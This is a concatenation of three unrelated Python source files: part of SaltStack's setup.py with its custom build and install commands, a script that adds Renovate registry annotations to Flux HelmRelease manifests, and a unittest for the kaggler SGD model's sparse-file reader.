chunks wfh.write(chunk) wfh.flush() else: log.error( "Failed to download {}.dll to {} from {}".format( fname, fdest, furl ) ) except ImportError: req = urlopen(furl) if req.getcode() == 200: with open(fdest, "wb") as wfh: while True: chunk = req.read(4096) if not chunk: break wfh.write(chunk) wfh.flush() else: log.error( "Failed to download {}.dll to {} from {}".format( fname, fdest, furl ) ) class Sdist(sdist): def make_release_tree(self, base_dir, files): if self.distribution.ssh_packaging: self.distribution.salt_ssh_packaging_file = PACKAGED_FOR_SALT_SSH_FILE self.run_command("write_salt_ssh_packaging_file") 
self.filelist.files.append(os.path.basename(PACKAGED_FOR_SALT_SSH_FILE)) sdist.make_release_tree(self, base_dir, files) # Let's generate salt/_version.py to include in the sdist tarball self.distribution.running_salt_sdist = True self.distribution.salt_version_hardcoded_path = os.path.join( base_dir, "salt", "_version.py" ) self.run_command("write_salt_version") def make_distribution(self): sdist.make_distribution(self) if self.distribution.ssh_packaging: os.unlink(PACKAGED_FOR_SALT_SSH_FILE) class BDistEgg(bdist_egg): def finalize_options(self): bdist_egg.finalize_options(self) self.distribution.build_egg = True if not self.skip_build: self.run_command("build") class CloudSdist(Sdist): # pylint: disable=too-many-ancestors user_options = Sdist.user_options + [ ( "download-bootstrap-script", None, "Download the latest stable bootstrap-salt.sh script. This " "can also be triggered by having `DOWNLOAD_BOOTSTRAP_SCRIPT=1` as an " "environment variable.", ) ] boolean_options = Sdist.boolean_options + ["download-bootstrap-script"] def initialize_options(self): Sdist.initialize_options(self) self.skip_bootstrap_download = True self.download_bootstrap_script = False def finalize_options(self): Sdist.finalize_options(self) if "SKIP_BOOTSTRAP_DOWNLOAD" in os.environ: # pylint: disable=not-callable log( "Please stop using 'SKIP_BOOTSTRAP_DOWNLOAD' and use " "'DOWNLOAD_BOOTSTRAP_SCRIPT' instead" ) # pylint: enable=not-callable if "DOWNLOAD_BOOTSTRAP_SCRIPT" in os.environ: download_bootstrap_script = os.environ.get("DOWNLOAD_BOOTSTRAP_SCRIPT", "0") self.download_bootstrap_script = download_bootstrap_script == "1" def run(self): if self.download_bootstrap_script is True: # Let's update the bootstrap-script to the version defined to be # distributed. See BOOTSTRAP_SCRIPT_DISTRIBUTED_VERSION above. url = ( "https://github.com/saltstack/salt-bootstrap/raw/{}" "/bootstrap-salt.sh".format(BOOTSTRAP_SCRIPT_DISTRIBUTED_VERSION) ) deploy_path = os.path.join( SETUP_DIRNAME, "salt", "cloud", "deploy", "bootstrap-salt.sh" ) log.info( "Updating bootstrap-salt.sh." "\n\tSource: {}" "\n\tDestination: {}".format(url, deploy_path) ) try: import requests req = requests.get(url) if req.status_code == 200: script_contents = req.text.encode(req.encoding) else: log.error( "Failed to update the bootstrap-salt.sh script. HTTP " "Error code: {}".format(req.status_code) ) except ImportError: req = urlopen(url) if req.getcode() == 200: script_contents = req.read() else: log.error( "Failed to update the bootstrap-salt.sh script. 
HTTP " "Error code: {}".format(req.getcode()) ) try: with open(deploy_path, "w") as fp_: fp_.write(script_contents) except OSError as err: log.error("Failed to write the updated script: {}".format(err)) # Let's the rest of the build command Sdist.run(self) def write_manifest(self): # We only need to ship the scripts which are supposed to be installed dist_scripts = self.distribution.scripts for script in self.filelist.files[:]: if not script.startswith("scripts/"): continue if script not in dist_scripts: self.filelist.files.remove(script) return Sdist.write_manifest(self) class TestCommand(Command): description = "Run tests" user_options = [ ("runtests-opts=", "R", "Command line options to pass to runtests.py") ] def initialize_options(self): self.runtests_opts = None def finalize_options(self): """ Abstract method that is required to be overwritten """ def run(self): # This should either be removed or migrated to use nox import subprocess self.run_command("build") build_cmd = self.get_finalized_command("build_ext") runner = os.path.abspath("tests/runtests.py") test_cmd = [sys.executable, runner] if self.runtests_opts: test_cmd.extend(self.runtests_opts.split()) print("running test") ret = subprocess.run( test_cmd, stdout=sys.stdout, stderr=sys.stderr, cwd=build_cmd.build_lib, check=False, ) sys.exit(ret.returncode) class Clean(clean): def run(self): clean.run(self) # Let's clean compiled *.py[c,o] for subdir in ("salt", "tests", "doc"): root = os.path.join(os.path.dirname(__file__), subdir) for dirname, _, _ in os.walk(root): for to_remove_filename in glob.glob("{}/*.py[oc]".format(dirname)): os.remove(to_remove_filename) if HAS_BDIST_WHEEL: class BDistWheel(bdist_wheel): def finalize_options(self): bdist_wheel.finalize_options(self) self.distribution.build_wheel = True INSTALL_VERSION_TEMPLATE = """\ # This file was auto-generated by salt's setup from salt.version import SaltStackVersion __saltstack_version__ = SaltStackVersion{full_version_info!r} """ INSTALL_SYSPATHS_TEMPLATE = """\ # This file was auto-generated by salt's setup on \ {date:%A, %d %B %Y @ %H:%m:%S UTC}. ROOT_DIR = {root_dir!r} SHARE_DIR = {share_dir!r} CONFIG_DIR = {config_dir!r} CACHE_DIR = {cache_dir!r} SOCK_DIR = {sock_dir!r} SRV_ROOT_DIR= {srv_root_dir!r} BASE_FILE_ROOTS_DIR = {base_file_roots_dir!r} BASE_PILLAR_ROOTS_DIR = {base_pillar_roots_dir!r} BASE_MASTER_ROOTS_DIR = {base_master_roots_dir!r} BASE_THORIUM_ROOTS_DIR = {base_thorium_roots_dir!r} LOGS_DIR = {logs_dir!r} PIDFILE_DIR = {pidfile_dir!r} SPM_PARENT_PATH = {spm_parent_path!r} SPM_FORMULA_PATH = {spm_formula_path!r} SPM_PILLAR_PATH = {spm_pillar_path!r} SPM_REACTOR_PATH = {spm_reactor_path!r} HOME_DIR = {home_dir!r} """ class Build(build): def run(self): # Run build.run function build.run(self) salt_build_ver_file = os.path.join(self.build_lib, "salt", "_version.py") if getattr(self.distribution, "with_salt_version", False): # Write the hardcoded salt version module salt/_version.py self.distribution.salt_version_hardcoded_path = salt_build_ver_file self.run_command("write_salt_version") if getattr(self.distribution, "build_egg", False): # we are building an egg package. need to include _version.py self.distribution.salt_version_hardcoded_path = salt_build_ver_file self.run_command("write_salt_version") if getattr(self.distribution, "build_wheel", False): # we are building a wheel package. 
need to include _version.py self.distribution.salt_version_hardcoded_path = salt_build_ver_file self.run_command("write_salt_version") if getattr(self.distribution, "running_salt_install", False): # If our install attribute is present and set to True, we'll go # ahead and write our install time python modules. # Write the hardcoded salt version module salt/_version.py self.run_command("write_salt_version") # Write the system paths file self.distribution.salt_syspaths_hardcoded_path = os.path.join( self.build_lib, "salt", "_syspaths.py" ) self.run_command("generate_salt_syspaths") class Install(install): def initialize_options(self): install.initialize_options(self) def finalize_options(self): install.finalize_options(self) def run(self): if LooseVersion(setuptools.__version__) < LooseVersion("9.1"): sys.stderr.write( "\n\nInstalling Salt requires setuptools >= 9.1\n" "Available setuptools version is {}\n\n".format(setuptools.__version__) ) sys.stderr.flush() sys.exit(1) # Let's set the running_salt_install attribute so we can add # _version.py in the build command self.distribution.running_salt_install = True self.distribution.salt_version_hardcoded_path = os.path.join( self.build_lib, "salt", "_version.py" ) if IS_WINDOWS_PLATFORM: # Download the required DLLs self.distribution.salt_download_windows_dlls = True self.run_command("download-windows-dlls") self.distribution.salt_download_windows_dlls = None # need to ensure _version.py is created in build dir before install if not os.path.exists(os.path.join(self.build_lib)): if not self.skip_build: self.run_command("build") else: self.run_command("write_salt_version") # Run install.run install.run(self) @staticmethod def _called_from_setup(run_frame): """ Attempt to detect whether run() was called from setup() or by another command. If called by setup(), the parent caller will be the 'run_command' method in 'distutils.dist', and *its* caller will be the 'run_commands' method. If called any other way, the immediate caller *might* be 'run_command', but it won't have been called by 'run_commands'. Return True in that case or if a call stack is unavailable. Return False otherwise. """ if run_frame is None: # If run_frame is None, just call the parent class logic return install._called_from_setup(run_frame) # Because Salt subclasses the setuptools install command, it needs to # override this static method to provide the right frame for the logic # so apply. # We first try the current run_frame in case the issue # https://github.com/pypa/setuptools/issues/456 is fixed. first_call = install._called_from_setup(run_frame) if first_call: return True # Fallback to providing the parent frame to have the right logic kick in second_call = install._called_from_setup(run_frame.f_back) if second_call is None: # There was no parent frame?! 
return first_call return second_call class InstallLib(install_lib): def run(self): executables = [ "salt/templates/git/ssh-id-wrapper", "salt/templates/lxc/salt_tarball", ] install_lib.run(self) # input and outputs match 1-1 inp = self.get_inputs() out = self.get_outputs() chmod = [] for idx, inputfile in enumerate(inp): for executable in executables: if inputfile.endswith(executable): chmod.append(idx) for idx in chmod: filename = out[idx] os.chmod(filename, 0o755) # <---- Custom Distutils/Setuptools Commands ------------------------------------------------------------------------- # ----- Custom Distribution Class -----------------------------------------------------------------------------------> # We use this to override the package name in case --ssh-packaging is passed to # setup.py or the special .salt-ssh-package is found class SaltDistribution(distutils.dist.Distribution): """ Just so it's completely clear Under windows, the following scripts should be installed: * salt-call * salt-cp * salt-minion * salt-syndic * salt-unity * spm When packaged for salt-ssh, the following scripts should be installed: * salt-call * salt-run * salt-ssh * salt-cloud Under windows, the following scripts should be omitted from the salt-ssh package: * salt-cloud * salt-run Under *nix, all scripts should be installed """ global_options = ( distutils.dist.Distribution.global_options + [ ("ssh-packaging", None, "Run in SSH packaging mode"), ( "salt-transport=", None, "The transport to prepare salt for. Currently, the only choice " "is 'zeromq'. This may be expanded in the future. Defaults to " "'zeromq'", "zeromq", ), ] + [ ( "with-salt-version=", None, "Set a fixed version for Salt instead calculating it", ), # Salt's Paths Configuration Settings ("salt-root-dir=", None, "Salt's pre-configured root directory"), ("salt-share-dir=", None, "Salt's pre-configured share directory"), ("salt-config-dir=", None, "Salt's pre-configured configuration directory"), ("salt-cache-dir=", None, "Salt's pre-configured cache directory"), ("salt-sock-dir=", None, "Salt's pre-configured socket directory"), ("salt-srv-root-dir=", None, "Salt's pre-configured service directory"), ( "salt-base-file-roots-dir=", None, "Salt's pre-configured file roots directory", ), ( "salt-base-pillar-roots-dir=", None, "Salt's pre-configured pillar roots directory", ), ( "salt-base-master-roots-dir=", None, "Salt's pre-configured master roots directory", ), ("salt-logs-dir=", None, "Salt's pre-configured logs directory"), ("salt-pidfile-dir=", None, "Salt's pre-configured pidfiles directory"), ( "salt-spm-formula-dir=", None, "Salt's pre-configured SPM formulas directory", ), ( "salt-spm-pillar-dir=", None, "Salt's pre-configured SPM pillar directory", ), ( "salt-spm-reactor-dir=", None, "Salt's pre-configured SPM reactor directory", ), ("salt-home-dir=", None, "Salt's pre-configured user home directory"), ] ) def __init__(self, attrs=None): distutils.dist.Distribution.__init__(self, attrs) self.ssh_packaging = PACKAGED_FOR_SALT_SSH self.salt_transport = None # Salt Paths Configuration Settings self.salt_root_dir = None self.salt_share_dir = None self.salt_config_dir = None self.salt_cache_dir = None self.salt_sock_dir = None self.salt_srv_root_dir = None self.salt_base_file_roots_dir = None self.salt_base_thorium_roots_dir = None self.salt_base_pillar_roots_dir = None self.salt_base_master_roots_dir = None self.salt_logs_dir = None self.salt_pidfile_dir = None self.salt_spm_parent_dir = None self.salt_spm_formula_dir = None 
self.salt_spm_pillar_dir = None self.salt_spm_reactor_dir = None self.salt_home_dir = None # Salt version self.with_salt_version = None self.name = "salt-ssh" if PACKAGED_FOR_SALT_SSH else "salt" self.salt_version = __version__ # pylint: disable=undefined-variable self.description = "Portable, distributed, remote execution and configuration management system" with open(SALT_LONG_DESCRIPTION_FILE, encoding="utf-8") as f: self.long_description = f.read() self.long_description_content_type = "text/x-rst" self.python_requires = ">=3.5" self.classifiers = [ "Programming Language :: Python", "Programming Language :: Cython", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.5", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "Intended Audience :: Information Technology", "Intended Audience :: System Administrators", "License :: OSI Approved :: Apache Software License", "Operating System :: POSIX :: Linux", "Topic :: System :: Clustering", "Topic :: System :: Distributed Computing", ] self.author = "Thomas S Hatch" self.author_email = "[email protected]" self.url = "https://saltproject.io" self.cmdclass.update( { "test": TestCommand, "clean": Clean, "build": Build, "sdist": Sdist, "bdist_egg": BDistEgg, "install": Install, "develop": Develop, "write_salt_version": WriteSaltVersion, "generate_salt_syspaths": GenerateSaltSyspaths, "write_salt_ssh_packaging_file": WriteSaltSshPackagingFile, } ) if not IS_WINDOWS_PLATFORM: self.cmdclass.update({"sdist": CloudSdist, "install_lib": InstallLib}) if IS_WINDOWS_PLATFORM: self.cmdclass.update({"download-windows-dlls": DownloadWindowsDlls}) if HAS_BDIST_WHEEL: self.cmdclass["bdist_wheel"] = BDistWheel self.license = "Apache Software License 2.0" self.packages = self.discover_packages() self.zip_safe = False if HAS_ESKY: self.setup_esky() self.update_metadata() def update_metadata(self): for attrname in dir(self): if attrname.startswith("__"): continue attrvalue = getattr(self, attrname, None) if attrvalue == 0: continue if attrname == "salt_version": attrname = "version" if hasattr(self.metadata, "set_{}".format(attrname)): getattr(self.metadata, "set_{}".format(attrname))(attrvalue) elif hasattr(self.metadata, attrname): try: setattr(self.metadata, attrname, attrvalue) except AttributeError: pass def discover_packages(self): modules = [] for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, "salt")): if "__init__.py" not in files: continue modules.append(os.path.relpath(root, SETUP_DIRNAME).replace(os.sep, ".")) return modules # ----- Static Data --------------------------------------------------------------------------------------------> @property def _property_dependency_links(self): return [ "https://github.com/saltstack/salt-testing/tarball/develop#egg=SaltTesting" ] @property def _property_tests_require(self): return ["SaltTesting"] # <---- Static Data ---------------------------------------------------------------------------------------------- # ----- Dynamic Data --------------------------------------------------------------------------------------------> @property def _property_package_data(self): package_data = { "salt.templates": [ "rh_ip/*.jinja", "debian_ip/*.jinja", "virt/*.jinja", "git/*", "lxc/*", ] } if not IS_WINDOWS_PLATFORM: 
package_data["salt.cloud"] = ["deploy/*.sh"] if not self.ssh_packaging and not PACKAGED_FOR_SALT_SSH: package_data["salt.daemons.flo"] = ["*.flo"] return package_data @property def _property_data_files(self): # Data files common to all scenarios data_files = [ ("share/man/man1", ["doc/man/salt-call.1", "doc/man/salt-run.1"]), ("share/man/man7", ["doc/man/salt.7"]), ] if self.ssh_packaging or PACKAGED_FOR_SALT_SSH: data_files[0][1].append("doc/man/salt-ssh.1") if IS_WINDOWS_PLATFORM: return data_files data_files[0][1].append("doc/man/salt-cloud.1") return data_files if IS_WINDOWS_PLATFORM: data_files[0][1].extend( [ "doc/man/salt-api.1", "doc/man/salt-cp.1", "doc/man/salt-key.1", "doc/man/salt-minion.1", "doc/man/salt-syndic.1", "doc/man/salt-unity.1", "doc/man/spm.1", ] ) return data_files # *nix, so, we need all man pages data_files[0][1].extend( [ "doc/man/salt-api.1", "doc/man/salt-cloud.1", "doc/man/salt-cp.1", "doc/man/salt-key.1", "doc/man/salt-master.1", "doc/man/salt-minion.1", "doc/man/salt-proxy.1", "doc/man/spm.1", "doc/man/salt.1", "doc/man/salt-ssh.1", "doc/man/salt-syndic.1", "doc/man/salt-unity.1", ] ) return data_files @property def _property_install_requires(self): install_requires = [] if USE_STATIC_REQUIREMENTS is True: # We've been explicitly asked to use static requirements if IS_OSX_PLATFORM: for reqfile in SALT_OSX_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) elif IS_WINDOWS_PLATFORM: for reqfile in SALT_WINDOWS_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) else: for reqfile in SALT_LINUX_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) return install_requires elif USE_STATIC_REQUIREMENTS is False: # We've been explicitly asked NOT to use static requirements if IS_OSX_PLATFORM: for reqfile in SALT_OSX_REQS: install_requires += _parse_requirements_file(reqfile) elif IS_WINDOWS_PLATFORM: for reqfile in SALT_WINDOWS_REQS: install_requires += _parse_requirements_file(reqfile) else: for reqfile in SALT_BASE_REQUIREMENTS: install_requires += _parse_requirements_file(reqfile) else: # This is the old and default behavior if IS_OSX_PLATFORM: for reqfile in SALT_OSX_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) elif IS_WINDOWS_PLATFORM: for reqfile in SALT_WINDOWS_LOCKED_REQS: install_requires += _parse_requirements_file(reqfile) else: for reqfile in SALT_BASE_REQUIREMENTS: install_requires += _parse_requirements_file(reqfile) return install_requires @property def _property_scripts(self): # Scripts common to all scenarios scripts = ["scripts/salt-call", "scripts/salt-run"] if self.ssh_packaging or PACKAGED_FOR_SALT_SSH: scripts.append("scripts/salt-ssh") if IS_WINDOWS_PLATFORM: return scripts scripts.extend(["scripts/salt-cloud", "scripts/spm"]) return scripts if IS_WINDOWS_PLATFORM: scripts.extend( [ "scripts/salt-api", "scripts/salt-cp", "scripts/salt-key", "scripts/salt-minion", "scripts/salt-syndic", "scripts/salt-unity", "scripts/spm", ] ) return scripts # *nix, so, we need all scripts scripts.extend( [ "scripts/salt", "scripts/salt-api", "scripts/salt-cloud", "scripts/salt-cp", "scripts/salt-key", "scripts/salt-master", "scripts/salt-minion", "scripts/salt-proxy", "scripts/salt-ssh", "scripts/salt-syndic", "scripts/salt-unity", "scripts/spm", ] ) return scripts @property def _property_entry_points(self): # console scripts common to all scenarios scripts = [ "salt-call = salt.scripts:salt_call", "salt-run = salt.scripts:salt_run", ] if self.ssh_packaging or PACKAGED_FOR_SALT_SSH: 
scripts.append("salt-ssh = salt.scripts:salt_ssh") if IS_WINDOWS_PLATFORM: return {"console_scripts": scripts} scripts.append("salt-cloud = salt.scripts:salt_cloud") return {"console_scripts": scripts} if IS_WINDOWS_PLATFORM: scripts.extend( [ "salt-api = salt.scripts:salt_api", "salt-cp = salt.scripts:salt_cp", "salt-key = salt.scripts:salt_key", "salt-minion = salt.scripts:salt_minion", "salt-syndic = salt.scripts:salt_syndic", "salt-unity = salt.scripts:salt_unity", "spm = salt.scripts:salt_spm", ] ) return {"console_scripts": scripts} # *nix, so, we need all scripts scripts.extend( [ "salt = salt.scripts:salt_main", "salt-api = salt.scripts:salt_api", "salt-cloud = salt.scripts:salt_cloud", "salt-cp = salt.scripts:salt_cp", "salt-key = salt.scripts:salt_key", "salt-master = salt.scripts:salt_master", "salt-minion = salt.scripts:salt_minion", "salt-ssh = salt.scripts:salt_ssh", "salt-syndic = salt.scripts:salt_syndic", "salt-unity = salt.scripts:salt_unity", "spm = salt.scripts:salt_spm", ] ) return {"console_scripts": scripts} # <---- Dynamic Data --------------------------------------------------------------------------------------------- # ----- Esky Setup ----------------------------------------------------------------------------------------------> def setup_esky(self): opt_dict = self.get_option_dict("bdist_esky") opt_dict["freezer_module"] = ("setup script", "bbfreeze") opt_dict["freezer_options"] = ( "setup script", {"includes": self.get_esky_freezer_includes()}, ) @property def _property_freezer_options(self): return {"includes": self.get_esky_freezer_includes()} def get_esky_freezer_includes(self): # Sometimes the auto module traversal doesn't find everything, so we # explicitly add it. The auto dependency tracking especially does not work for # imports occurring in salt.modules, as they are loaded at salt runtime. # Specifying includes that don't exist doesn't appear to cause a freezing # error. 
freezer_includes = [ "zmq.core.*", "zmq.utils.*", "ast", "csv", "difflib", "distutils", "distutils.version", "numbers", "json", "M2Crypto", "Cookie", "asyncore", "fileinput", "sqlite3", "email", "email.mime.*", "requests", "sqlite3", ] if HAS_ZMQ and hasattr(zmq, "pyzmq_version_info"): if HAS_ZMQ and zmq.pyzmq_version_info() >= (0, 14): # We're freezing, and when freezing ZMQ needs to be installed, so this # works fine if "zmq.core.*" in freezer_includes: # For PyZMQ >= 0.14, freezing does not need 'zmq.core.*' freezer_includes.remove("zmq.core.*") if IS_WINDOWS_PLATFORM: freezer_includes.extend( [ "imp", "win32api", "win32file", "win32con", "win32com", "win32net", "win32netcon", "win32gui", "win32security", "ntsecuritycon", "pywintypes", "pythoncom", "_winreg", "wmi", "site", "psutil", "pytz", ] ) elif IS_SMARTOS_PLATFORM: # we have them as requirements in pkg/smartos/esky/requirements.txt # all these should be safe to force include freezer_includes.extend( ["cherrypy", "python-dateutil", "pyghmi", "croniter", "mako", "gnupg"] ) elif sys.platform.startswith("linux"): freezer_includes.append("spwd") try: import yum # pylint: disable=unused-import freezer_includes.append("yum") except ImportError: pass elif sys.platform.startswith("sunos"): # (The sledgehammer approach) # Just try to include everything # (This may be a better way to generate freezer_includes generally) try: from bbfreeze.modulegraph.modulegraph import ModuleGraph mgraph = ModuleGraph(sys.path[:]) for arg in glob.glob("salt/modules/*.py"): mgraph.run_script(arg) for mod in mgraph.flatten(): if type(mod).__name__ != "Script" and mod.filename: freezer_includes.append(str(os.path.basename(mod.identifier))) except ImportError: pass return freezer_includes # <---- Esky Setup ----------------------------------------------------------------------------------------------- # ----- Overridden Methods --------------------------------------------------------------------------------------> def parse_command_line(self): args = distutils.dist.Distribution.parse_command_line(self) if not self.ssh_packaging and PACKAGED_FOR_SALT_SSH: self.ssh_packaging = 1 if self.ssh_packaging: self.metadata.name = "salt-ssh" self.salt_transport = "ssh" elif self.salt_transport is None: self.salt_transport = "zeromq" if self.salt_transport not in ("zeromq", "both", "ssh", "none"): raise DistutilsArgError( "The value of --salt-transport needs be 'zeromq', " "'both', 'ssh', or 'none' not '{}'".format(self.salt_transport) ) # Setup our property functions after class initialization and # after parsing the command line since most are set to None # ATTENTION: This should be the last step before returning the args or # some of the requirements won't be correctly set for funcname in dir(self): if not funcname.startswith("_property_"): continue property_name = funcname.split("_property_", 1)[-1] setattr(self, property_name, getattr(self, funcname)) return args # <---- Overridden Methods --------------------------------------------------------------------------------------- # <---- Custom Distribution Class ------------------------------------------------------------------------------------ if __name__ == "__main__": setup(distclass=SaltDistribution)
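# --- Illustration (not part of setup.py proper) ------------------------------
# A small, hedged sketch of how the requirement-parsing helpers above behave:
# comment lines and "-r"/"--" directives are skipped, and a trailing
# "; python_version <op> <ver>" marker is evaluated against the running
# interpreter via _parse_op/_parse_ver/_check_ver. The file contents and path
# below are made up purely for illustration.
import tempfile

def _demo_parse_requirements():
    fake_requirements = "\n".join([
        "# comment lines are ignored",
        "-r base.txt",
        "Jinja2",
        "pyzmq>=17.0.0; python_version >= '3.0'",
    ])
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(fake_requirements)
        path = fh.name
    # On any Python 3.x interpreter this is expected to keep both real
    # requirements: ['Jinja2', 'pyzmq>=17.0.0'].
    return _parse_requirements_file(path)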
the-stack_106_24316
#!/usr/bin/env python3 """Updates HelmReleases with an annotation consumeable by rennovate. This script adds annotations fo HelmRelease files so that rennovate can manage chart upgrades. This script accepts a --cluster-path argument which should point at a fluxv2 repository that contains Kustomization yaml files, referring to HelmReleases. The script takes a few steps: - Find all HelmRepository entries in the cluster, and its associated chart url - Find all HelmReleases that reference a HelmRepository - Update all files that contain HelmReleases, with an annotation to reference the chart url for the repository. This is done as a second pass to handle and kustomize overlays. """ import logging import os import subprocess from pathlib import Path import click import yaml DEFAULT_NAMESPACE = "default" INCLUDE_FILES = [".yaml", ".yml"] HELM_REPOSITORY_APIVERSIONS = ["source.toolkit.fluxcd.io/v1beta1"] HELM_RELEASE_APIVERSIONS = ["helm.toolkit.fluxcd.io/v2beta1"] RENOVATE_STRING = "# renovate: registryUrl=" class ClusterPath(click.ParamType): name = "cluster-path" def convert(self, value, param, ctx): clusterPath = Path(value) if not isinstance(value, tuple): if not clusterPath.exists: self.fail(f"invalid --cluster-path '{value}'") return clusterPath def yaml_load_files(files): """A generator that loads the contents of all files in yaml.""" for file in files: for doc in yaml.safe_load_all(file.read_bytes()): if doc: yield (file, doc) def kind_filter(kind, api_versions): """Return a yaml doc filter for specified resource type and version.""" def func(pair): (file, doc) = pair if doc.get("kind") != kind: return False return doc.get("apiVersion") in api_versions return func def namespaced_name(doc): """Return a named yaml resource, falling back to a default namespace.""" name = doc["name"] namespace = doc.get("namespace", DEFAULT_NAMESPACE) return f"{namespace}/{name}" @click.command() @click.option( "--cluster-path", envvar="CLUSTER_PATH", type=ClusterPath(), required=True, help="Path to cluster root, e.g. './cluster'" ) @click.option( "--debug", envvar="DEBUG", is_flag=True, default=False, required=False, help="Turn on debug logging" ) @click.option( "--dry-run", envvar="DRY_RUN", is_flag=True, default=False, required=False, help="Do not alter Helm Release files" ) @click.pass_context def cli(ctx, cluster_path, debug, dry_run): ctx.obj = { "cluster_path": cluster_path, "debug": debug, "dry_run": dry_run } # pylint: disable=no-value-for-parameter log = logger() files = [p for p in cluster_path.rglob("*") if p.suffix in INCLUDE_FILES] yaml_docs = list(yaml_load_files(files)) # Build a map of HelmRepository name to chart url helm_repo_charts = {} is_helm_repo = kind_filter("HelmRepository", HELM_REPOSITORY_APIVERSIONS) for (file, doc) in filter(is_helm_repo, yaml_docs): helm_repo_name = namespaced_name(doc["metadata"]) helm_repo_url = doc["spec"]["url"] log.info(f"Found HelmRepository '{helm_repo_name}' url '{helm_repo_url}'") helm_repo_charts[helm_repo_name] = helm_repo_url # Walk all HelmReleases and create a map of release names to repos. 
is_helm_release = kind_filter("HelmRelease", HELM_RELEASE_APIVERSIONS) helm_release_docs = list(filter(is_helm_release, yaml_docs)) helm_releases = {} for (file, doc) in helm_release_docs: helm_release_name = namespaced_name(doc["metadata"]) chart_spec = doc["spec"]["chart"]["spec"] source_ref = chart_spec.get("sourceRef") if not source_ref: # This release may be an overlay, so the repo name could be inferred from the # release name of the base HelmRelease in a second pass below. log.debug(f"Skipping '{helm_release_name}': No 'sourceRef' in spec.chart.spec") continue helm_repo_name = namespaced_name(source_ref) if helm_repo_name not in helm_repo_charts: log.warning(f"Skipping '{helm_release_name}': No HelmRepository for '{helm_repo_name}'") continue if helm_release_name in helm_releases: if helm_releases[helm_release_name] != helm_repo_name: log.warning(f"HelmRelease '{helm_release_name}' mismatched repo '{helm_repo_name}'") continue log.info(f"Found HelmRelease '{helm_release_name}' with repo '{helm_repo_name}'") helm_releases[helm_release_name] = helm_repo_name # Walk all HelmReleases and find the referenced HelmRepository by the # chart sourceRef and update the renovate annotation. for (file, doc) in helm_release_docs: helm_release_name = namespaced_name(doc["metadata"]) if helm_release_name not in helm_releases: log.debug(f"Skipping '{helm_release_name}': Could not determine repo") continue # Renovate can only update chart specs that contain a name and version, # so don't bother annotating if its not present. chart_spec = doc["spec"]["chart"]["spec"] if "chart" not in chart_spec or "version" not in chart_spec: log.debug(f"Skipping '{helm_release_name}': No 'chart' or 'version' in spec.chart.spec") continue helm_repo_name = helm_releases[helm_release_name] if helm_repo_name not in helm_repo_charts: log.debug(f"Skipping '{file}': Not HelmRepostory '{helm_repo_name}' found") continue chart_url = helm_repo_charts[helm_repo_name] if dry_run: log.warning( f"Skipping '{helm_repo_name}' annotations in '{file}' with '{chart_url}' as this is a dry run" ) continue log.info( f"Updating '{helm_repo_name}' renovate annotations in '{file}' with '{chart_url}'" ) with open(file, mode="r") as fid: lines = fid.read().splitlines() with open(file, mode="w") as fid: for line in lines: if RENOVATE_STRING in line: continue if " chart: " in line: indent_spaces = len(line) - len(line.lstrip()) fid.write(f"{' ' * indent_spaces}{RENOVATE_STRING}{chart_url}\n") pass fid.write(f"{line}\n") @click.pass_context def logger(ctx): """Set up logging """ logging.basicConfig( level=(logging.DEBUG if ctx.obj["debug"] else logging.INFO), format="%(asctime)s %(name)s %(levelname)-8s %(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) return logging.getLogger("Renovate Helm Releases") if __name__ == "__main__": # pylint: disable=no-value-for-parameter cli()
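# --- Illustration (hypothetical input/output, not executed by the script) ----
# A hedged sketch of the textual change this tool makes to a HelmRelease file:
# any previous renovate annotation lines are dropped, and a fresh
# "# renovate: registryUrl=<url>" line is written directly above the
# "chart: <name>" entry with matching indentation. The chart name, version,
# repository name and URL below are made up for illustration.
EXAMPLE_BEFORE = """\
spec:
  chart:
    spec:
      chart: ingress-nginx
      version: 3.29.0
      sourceRef:
        kind: HelmRepository
        name: ingress-nginx-charts
        namespace: flux-system
"""

EXAMPLE_AFTER = """\
spec:
  chart:
    spec:
      # renovate: registryUrl=https://kubernetes.github.io/ingress-nginx
      chart: ingress-nginx
      version: 3.29.0
      sourceRef:
        kind: HelmRepository
        name: ingress-nginx-charts
        namespace: flux-system
"""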
the-stack_106_24317
import os
import unittest

from kaggler.online_model import SGD


DUMMY_SPARSE_STR = """0 1:1 3:1 10:1
0 3:1 5:1
1 4:1 6:1 8:1 10:1"""
DUMMY_Y = [0, 0, 1]
DUMMY_LEN_X = [3, 2, 4]


class TestSGD(unittest.TestCase):

    def setUp(self):
        self.model = SGD(n=2**10, a=0.1, l1=1, l2=1, interaction=True)
        self.sparse_file = '/tmp/dummy.sps'

        # Create a dummy sparse file.
        with open(self.sparse_file, 'w') as f:
            f.write(DUMMY_SPARSE_STR)

    def tearDown(self):
        # If the dummy file exists, remove it.
        if os.path.isfile(self.sparse_file):
            os.remove(self.sparse_file)

    def test_read_sparse(self):
        len_xs = []
        ys = []
        for x, y in self.model.read_sparse(self.sparse_file):
            # Check for hash collisions among feature indices.
            self.assertEqual(len(set(x)), len(x))

            ys.append(y)
            len_xs.append(len(x))

        # Check that the target values are correct.
        self.assertEqual(ys, DUMMY_Y)

        # Check that the number of feature indices per row is correct.
        self.assertEqual(len_xs, DUMMY_LEN_X)


if __name__ == '__main__':
    unittest.main()
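# --- Usage sketch (assumptions noted, not part of the test suite) ------------
# A hedged illustration of the pieces exercised above: SGD hashes libsvm-style
# "index:value" features into an n-dimensional space, and read_sparse() yields
# (feature_indices, target) pairs one line at a time. Only read_sparse() is
# shown in this file, so the sketch sticks to it; the file path is a
# placeholder.
from kaggler.online_model import SGD

def count_rows(sparse_path='/tmp/train.sps'):
    model = SGD(n=2 ** 10, a=0.1, l1=1, l2=1, interaction=True)
    n_rows = 0
    for x, y in model.read_sparse(sparse_path):
        # x holds hashed feature indices, y the target for that row.
        n_rows += 1
    return n_rows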
the-stack_106_24319
